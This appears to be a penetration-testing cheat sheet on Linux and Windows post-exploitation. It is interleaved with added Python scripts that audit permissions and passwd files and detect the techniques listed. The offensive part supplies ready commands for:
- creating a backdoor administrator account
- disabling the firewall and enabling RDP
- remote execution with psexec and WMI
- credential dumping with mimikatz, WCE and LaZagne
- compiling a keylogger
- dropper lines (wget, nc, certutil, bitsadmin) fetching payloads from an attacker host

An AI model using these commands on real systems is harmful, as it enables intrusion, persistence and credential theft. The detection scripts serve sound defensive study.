🥷 The Art of Pentesting: Post-exploitation like an APT

Linux Post-exploitation most common and useful commands


Linux Post-exploitation

  • Check wrong permissions:

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

Find files world writable:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
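The three `find` one-liners above are the manual form of a permissions audit. As an added example (not code from the original post), the script below performs the same three checks in Python: it walks a tree, skips the pseudo-filesystems the `-prune` clauses exclude, and reports setuid/setgid binaries, world-writable files and world-writable directories, with the refinement that a sticky-bit directory such as `/tmp` is not reported. The tree it scans is a constructed fixture built in a temporary directory, so it runs without root on any host; point `audit_tree` at `/` for a real audit.

```python
"""Audit a directory tree for setuid/setgid binaries and world-writable files
or directories, the same checks the find one-liners above perform.
Added example, not from the original post; the scanned tree is a constructed
fixture built in a temporary directory so the script runs without root."""
import os
import stat
import tempfile

PRUNE = {"/proc", "/sys", "/dev"}  # pseudo-filesystems, like the -prune paths above


def audit_tree(root):
    """Walk ``root`` and return three sorted lists of paths:
    setuid/setgid binaries, world-writable files, world-writable directories.
    A world-writable directory with the sticky bit (like /tmp) is not reported."""
    suid, ww_files, ww_dirs = [], [], []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place: os.walk honours edits to dirnames.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISDIR(mode):
                if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                    ww_dirs.append(path)
            elif stat.S_ISREG(mode):
                if mode & (stat.S_ISUID | stat.S_ISGID):
                    suid.append(path)
                if mode & stat.S_IWOTH:
                    ww_files.append(path)
    return sorted(suid), sorted(ww_files), sorted(ww_dirs)


def build_sample_tree():
    """Construct a small tree with one finding of each kind (constructed fixture)."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    for rel in ("usr", "usr/bin", "opt", "opt/dropbox", "tmp"):
        os.mkdir(os.path.join(root, rel))
        os.chmod(os.path.join(root, rel), 0o755)  # explicit, so the umask cannot matter

    def touch(rel, mode):
        path = os.path.join(root, rel)
        open(path, "w").close()
        os.chmod(path, mode)
        return path

    touch("usr/bin/ls", 0o755)                           # normal binary: not reported
    touch("usr/bin/helper", 0o4755)                      # setuid: reported
    touch("opt/dropbox/config.ini", 0o666)               # world-writable file: reported
    os.chmod(os.path.join(root, "opt/dropbox"), 0o777)   # world-writable dir: reported
    os.chmod(os.path.join(root, "tmp"), 0o1777)          # sticky bit: not reported
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    labels = ("setuid/setgid binaries", "world-writable files", "world-writable directories")
    for label, paths in zip(labels, audit_tree(root)):
        print(label + ":")
        for p in paths:
            print("   ", p)
```

The `2> /dev/null` in the shell versions hides permission errors; here the equivalent is the `except OSError: continue`, which is why the script can be run as an unprivileged user and still report what that user is allowed to see.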

Look for interesting files:

find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null

Check sudo:

sudo su
sudo -l

Decrypt PKCS#12 objects:

openssl pkcs12 -info -in $FILE

Show certs in PKCS#7 file:

openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks
  • Commands for information gathering:

ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu

Find users with shell access:

egrep -e '/bin/(ba)?sh' /etc/passwd
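The `egrep` above only matches `sh` and `bash`, so an account whose login shell is `zsh`, `dash`, `ksh` or `fish` is missed. As an added example that is not from the original post, the script below generalises the check: it parses passwd lines (a constructed sample is embedded), treats every shell except the known non-interactive ones as a login shell, and additionally flags any account other than root that has UID 0, a classic hidden-administrator indicator.

```python
"""Audit /etc/passwd for accounts that can obtain an interactive shell and for
duplicate UID 0 accounts. Added example, not part of the original post; it
generalises the egrep above, which would miss zsh, dash, ksh or fish.
The passwd lines below are constructed sample data."""
import sys

# Shells that deny an interactive login; anything else is treated as a login shell.
NON_INTERACTIVE = {"/usr/sbin/nologin", "/sbin/nologin", "/usr/bin/nologin",
                   "/bin/false", "/usr/bin/false", "/bin/sync"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
postgres:x:110:115:PostgreSQL administrator:/var/lib/postgresql:/bin/zsh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
toor:x:0:0::/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/dash
svc_deploy:x:1001:1001::/opt/deploy:/bin/false
"""


def parse_passwd(text):
    """Yield (user, uid, shell) for each well-formed passwd line, skipping
    comments and malformed lines instead of crashing on a hand-edited file."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        try:
            uid = int(fields[2])
        except ValueError:
            continue
        shell = fields[6] or "/bin/sh"   # an empty shell field means /bin/sh
        yield fields[0], uid, shell


def interactive_accounts(text):
    """Accounts whose login shell is not one of the known non-interactive shells."""
    return [(user, uid, shell) for user, uid, shell in parse_passwd(text)
            if shell not in NON_INTERACTIVE]


def extra_uid0_accounts(text):
    """Accounts other than root with UID 0."""
    return [user for user, uid, _ in parse_passwd(text) if uid == 0 and user != "root"]


if __name__ == "__main__":
    # Pass a path (normally /etc/passwd) to audit a real file; default is the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for user, uid, shell in interactive_accounts(text):
        print("login shell:", user, uid, shell)
    for user in extra_uid0_accounts(text):
        print("extra UID 0 account:", user)
```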

Check bootup services:

ls /etc/rc*

SSH relationships and logins:

cat ~/.ssh/*


Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash of a file:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry for sensitive strings:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt

reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
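A caveat that matters when reading the two `AlwaysInstallElevated` queries above: the policy only takes effect when the value is 1 under both HKLM and HKCU, so a 1 in a single hive is not a finding. The following added example (not from the original post) parses the text that `reg query` writes into `reg_always.txt`, including the `ERROR:` line reg.exe prints when the key does not exist, and only reports the misconfiguration when both hives agree. The outputs it parses are constructed samples.

```python
"""Evaluate the AlwaysInstallElevated policy from `reg query` output.
Added example, not part of the original post. The policy is only effective
when the value is 1 under BOTH HKLM and HKCU, so both outputs are read.
The reg.exe outputs below are constructed samples."""
import re

KEY = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"

HKLM_SET = ("\nHKEY_LOCAL_MACHINE\\" + KEY + "\n"
            "    AlwaysInstallElevated    REG_DWORD    0x1\n")
HKCU_SET = ("\nHKEY_CURRENT_USER\\" + KEY + "\n"
            "    AlwaysInstallElevated    REG_DWORD    0x1\n")
HKCU_UNSET = ("\nHKEY_CURRENT_USER\\" + KEY + "\n"
              "    AlwaysInstallElevated    REG_DWORD    0x0\n")
MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"

# Value line as reg.exe prints it: name, type, data (hex 0x.. or decimal).
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$",
                      re.MULTILINE)


def parse_always_install_elevated(reg_output):
    """Return the DWORD as an int, or None when the key or value does not exist
    (reg.exe prints an ERROR line and no value line in that case)."""
    match = VALUE_RE.search(reg_output)
    if not match:
        return None
    return int(match.group(1), 0)   # base 0 accepts both "0x1" and "1"


def always_install_elevated_enabled(hklm_output, hkcu_output):
    """True only when the policy is enabled in both hives."""
    return (parse_always_install_elevated(hklm_output) == 1
            and parse_always_install_elevated(hkcu_output) == 1)


if __name__ == "__main__":
    for label, hkcu in (("both set", HKCU_SET), ("HKCU 0", HKCU_UNSET), ("HKCU missing", MISSING)):
        print(label, "->", always_install_elevated_enabled(HKLM_SET, hkcu))
```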

Check scheduler for vulnerable tasks:

schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt

Other checks:

DRIVERQUERY

Reboot the host through WMI (this actually reboots the machine; it is not a read-only check):

wmic os where Primary='TRUE' call reboot

List installed hotfixes (to spot missing patches):

wmic qfe

Open an NTFS alternate data stream (ADS) attached to a file:

notepad myfile.txt:lion.txt

eventvwr.exe

quser > rdp.txt

netstat -an > netstat.txt

netsh firewall show config > firewall.txt

icacls service.exe

type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt

wmic /node:$IP qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect

wmic /node:$IP product get name,version,vendor

wmic process get Caption,CommandLine

wmic printer list status

wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

Net commands:

net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr

How to set up a backdoor account:

net user hax0r hax0r /add

net localgroup administrators hax0r /add

net localgroup "Remote Desktop users" hax0r /add
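The three `net` commands above leave a very recognisable trail in the Security log: event 4720 (user account created) followed seconds later by 4732 (member added to a security-enabled local group) for Administrators and Remote Desktop Users. The following added example, which is not from the original post, correlates those two events: it raises one finding per account that is created and then added to a privileged group within a short window, and ignores privilege grants to pre-existing accounts (a separate rule). The event records are constructed and simplified; in real 4732 events the member is carried as a SID in MemberSid, which you would resolve to a name first.

```python
"""Correlate Windows Security events 4720 (account created) and 4732 (member
added to a local group) to detect the backdoor-account sequence shown above.
Added example, not part of the original post; the records are constructed and
use simplified field names."""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
WINDOW = timedelta(minutes=10)   # creation-to-privilege interval considered suspicious

SAMPLE_EVENTS = [  # constructed
    {"time": "2024-05-02T09:14:03", "id": 4720, "subject": "WS01\\jdoe", "target": "hax0r"},
    {"time": "2024-05-02T09:14:05", "id": 4732, "subject": "WS01\\jdoe",
     "group": "Administrators", "member": "hax0r"},
    {"time": "2024-05-02T09:14:09", "id": 4732, "subject": "WS01\\jdoe",
     "group": "Remote Desktop Users", "member": "hax0r"},
    {"time": "2024-05-02T11:30:00", "id": 4720, "subject": "WS01\\helpdesk", "target": "intern01"},
    {"time": "2024-05-02T11:30:20", "id": 4732, "subject": "WS01\\helpdesk",
     "group": "Users", "member": "intern01"},
    {"time": "2024-05-03T08:00:00", "id": 4732, "subject": "WS01\\admin",
     "group": "Administrators", "member": "ops_admin"},
    {"time": "2024-05-03T08:00:00", "id": 4720, "subject": "WS01\\admin", "target": "late_user"},
    {"time": "2024-05-03T10:00:00", "id": 4732, "subject": "WS01\\admin",
     "group": "Administrators", "member": "late_user"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_backdoor_accounts(events, window=WINDOW):
    """Return one finding per account that was created and then added to a
    privileged group within ``window``:
    {account, created_by, groups, seconds} where seconds is the delay to the
    first privileged grant."""
    events = sorted(events, key=lambda e: _ts(e["time"]))
    created = {}     # account (lower-case) -> (creation time, creator)
    findings = {}
    for event in events:
        if event["id"] == 4720:
            created[event["target"].lower()] = (_ts(event["time"]), event["subject"])
        elif event["id"] == 4732 and event["group"].lower() in PRIVILEGED_GROUPS:
            account = event["member"].lower()
            if account not in created:
                continue   # grant to a pre-existing account: covered by a different rule
            created_at, creator = created[account]
            delta = _ts(event["time"]) - created_at
            if not timedelta(0) <= delta <= window:
                continue
            finding = findings.get(account)
            if finding is None:
                finding = findings[account] = {
                    "account": event["member"], "created_by": creator,
                    "groups": [], "seconds": int(delta.total_seconds())}
            finding["groups"].append(event["group"])
    return list(findings.values())


if __name__ == "__main__":
    for finding in find_backdoor_accounts(SAMPLE_EVENTS):
        print(finding)
```

Of the constructed records, only `hax0r` matches: `intern01` is added to Users only, `ops_admin` was never created in the log, and `late_user` gets Administrators two hours after creation, outside the window.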

Check routing/network information:

route print
arp -A
ipconfig /all
getmac

Show files attributes / permissions

cacls cmd.exe
attrib cmd.exe

List services:

sc queryex type= service state= all

net start

Other info:

systeminfo
whoami

Equivalent on Windows XP:

echo %USERNAME%
  • Firewall managing commands

netsh firewall show stat

netsh firewall show config

netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes

netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000

netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080

netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
  • RDP

Show RDP sessions:

quser

qwinsta

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service type=remotedesktop mode=enable

net start termservice

net start "Terminal Services"

svchost.exe -k termsvcs

tasklist /svc /S servername /U username /P password

Change RDP daemon status from a Meterpreter session:

msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

More Meterpreter commands are in the post "🥷 Metasploit Meterpreter Cheat Sheet" (Learn Pentesting like a Pro).

Change the RDP port in the Windows Registry (the listening port is the PortNumber value under the RDP-Tcp WinStation key, REG_DWORD, default 3389):

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

Remote Execution commands:

wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND

wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber

tasklist.exe /S $IP /U domain\username

tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"

taskkill.exe /S $IP /U domain\username /F /FI "norton"

quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe

psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp

psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell with metasploit:

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(windows/local/ps_wmi_exec) >

On the same host but as another user:

runas /user:administrator cmd

runas /noprofile /user:DOMAIN\administrator cmd

runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

python windows-exploit-suggester.py --update

python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent

dir %USERPROFILE%\Favorites

type C:\Windows\System32\drivers\etc\hosts

LaZagne

Download LaZagne from https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

RATs (Remote Administration Tools)

  • Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python


Sniffers

Sniffers for Windows

Install Wireshark; its console capture tool, dumpcap, can also be used on its own:

dumpcap -D
dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

Password dumping

mimikatz

mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv

Fgdump

Dumps hashes (needs SYSTEM privileges)

fgdump.exe

WCE (Windows Credential Editor)

Dumps clear passwords:

wce -w

Dumps hashes:

wce

Persistent mode, writes to credentials.txt:

wce -r

Change your credentials in memory:

wce -s

Droppers

Droppers are programs that let you download tools, Trojans, etc. to the target machine in order to continue the compromise locally.

Droppers using Linux

wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE root@$IP:~

Droppers using Windows

Powershell (curl is an alias of Invoke-WebRequest in Windows PowerShell)

curl -Uri $URL

See also Powercat.

ROBOCOPY

NET USE \\$IP\IPC$ /USER:DOMAIN\USER

ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z

NET USE \\$IP\IPC$ /D

BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE

Certutil

certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe

Notepad

notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows


Examples:

hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:

csc.exe
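Every command in the firewall, RDP, dropper and LOLbin sections above runs a signed Windows binary with a tell-tale command line, which is exactly what process-creation telemetry (Security event 4688 with command-line auditing enabled, or Sysmon event 1) records. The following added example, not from the original post, applies a small rule set over such records: disabling a firewall profile, adding an allow rule, enabling RDP through fDenyTSConnections, and the certutil, bitsadmin, notepad and hh.exe download-or-launch patterns. The records are constructed (the IP is a documentation address) and the rule set is illustrative, not exhaustive; one refinement worth copying is that the hh.exe rule requires an `.exe` argument, so it does not fire on every help-file open.

```python
"""Command-line rules for process-creation telemetry (Security 4688 with
command-line auditing, or Sysmon event 1) covering the firewall, RDP, dropper
and LOLbin commands listed above. Added example, not part of the original
post; the records are constructed and the rules are illustrative."""
import re

# (rule name, process image basename, regex over the command line)
RULES = [
    ("firewall_disabled", "netsh.exe",
     re.compile(r"advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("firewall_allow_rule_added", "netsh.exe",
     re.compile(r"advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow", re.I)),
    ("rdp_enabled_via_registry", "reg.exe",
     re.compile(r"\badd\b.*Terminal Server.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("rdp_port_changed", "reg.exe",
     re.compile(r"\badd\b.*WinStations\\RDP-Tcp.*PortNumber", re.I)),
    ("certutil_download", "certutil.exe",
     re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    ("bitsadmin_download", "bitsadmin.exe",
     re.compile(r"/(transfer|addfile)\b.*\bhttps?://", re.I)),
    ("notepad_remote_url", "notepad.exe",
     re.compile(r"\bhttps?://", re.I)),
    ("hh_launches_executable", "hh.exe",
     re.compile(r"\s\S*\.exe\b", re.I)),   # an argument ending in .exe, not hh.exe itself
]

SAMPLE_RECORDS = [  # constructed (image path, command line); 198.51.100.7 is a documentation address
    ("C:\\Windows\\System32\\netsh.exe", "netsh advfirewall set allprofiles state off"),
    ("C:\\Windows\\System32\\netsh.exe", "netsh advfirewall show allprofiles"),
    ("C:\\Windows\\System32\\netsh.exe",
     'netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000'),
    ("C:\\Windows\\System32\\reg.exe",
     'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("C:\\Windows\\System32\\certutil.exe",
     'certutil.exe -urlcache -split -f "https://198.51.100.7/files/netcat.exe" nc.exe'),
    ("C:\\Windows\\System32\\certutil.exe", "certutil -hashfile C:\\Temp\\setup.msi SHA256"),
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /transfer myDownloadJob /download /priority normal http://198.51.100.7/tool.exe c:\\tool.exe"),
    ("C:\\Windows\\System32\\notepad.exe", "notepad.exe http://198.51.100.7/file.txt"),
    ("C:\\Windows\\hh.exe", "hh.exe C:\\windows\\system32\\calc.exe"),
    ("C:\\Windows\\System32\\notepad.exe", "notepad.exe C:\\Users\\jdoe\\notes.txt"),
]


def match_rules(records, rules=RULES):
    """Return [(rule name, image, command line)] for every record a rule matches.
    The image basename must equal the rule's process so a renamed copy is not
    matched by name alone (that case needs hash or signer checks, not shown)."""
    hits = []
    for image, cmdline in records:
        basename = image.rsplit("\\", 1)[-1].lower()
        for name, process, pattern in rules:
            if basename == process and pattern.search(cmdline):
                hits.append((name, image, cmdline))
    return hits


if __name__ == "__main__":
    for name, image, cmdline in match_rules(SAMPLE_RECORDS):
        print(f"{name:28} {cmdline}")
```

The benign records (`netsh advfirewall show`, `certutil -hashfile`, notepad on a local file) produce no hit, which is the property to keep an eye on when extending the rules: each pattern anchors on the switch that makes the command dangerous, not merely on the binary name.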

Droppers Using known protocols

HTTP

Python2

python -m SimpleHTTPServer
python -m SimpleHTTPServer 80

Python3

python3 -m http.server 8080

PHP

php -S localhost:8000

Ruby

ruby -run -e httpd . -p 8000

FTP

pip install pyftpdlib
python -m pyftpdlib

SMB

impacket-smbserver PAYLOADS /root/payload
